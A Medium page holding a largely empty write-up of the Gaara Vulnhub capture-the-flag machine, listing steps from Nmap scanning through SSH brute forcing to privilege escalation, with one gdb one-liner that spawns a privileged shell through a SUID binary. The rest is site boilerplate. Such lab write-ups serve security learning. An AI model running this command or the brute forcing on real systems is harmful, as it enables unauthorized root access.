Gaara Vulnhub Write-Up

1.) Target Discovery with Nmap

2.) Port Scanning with Nmap

3.) Web Enumeration

4.) SSH Brute forcing

5.) Privilege Escalation

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

--

--

--

Penetration Tester, CTF player, Full time Learner and Part Time Blogger. Twitter :- https://twitter.com/Exploiter_21, Linked :- https://www.linkedin.com/in/sart

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Learn vim in 3 days

A Review of the InvArch AMA with DELTAHUB CAPITAL

Automate E2E Tests with Cypress, Shopware and Mollie

What is Defect Life Cycle?

Combine CLI Tools with Elixir and Cizen

Harvard LIL Fellowship — Week 2

Building Scaleable CSS

Hello Everyone Today I am gonna share some amazing information that I received from the the live…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sarthak joshi

Sarthak joshi

Penetration Tester, CTF player, Full time Learner and Part Time Blogger. Twitter :- https://twitter.com/Exploiter_21, Linked :- https://www.linkedin.com/in/sart

More from Medium

ToolsRus CTF — Writeup

Pandora Walkthrough — Hack The Box

Hacker101 Micro-CMS v1 CTF Walkthrough

Proving Grounds Sirol walkthrough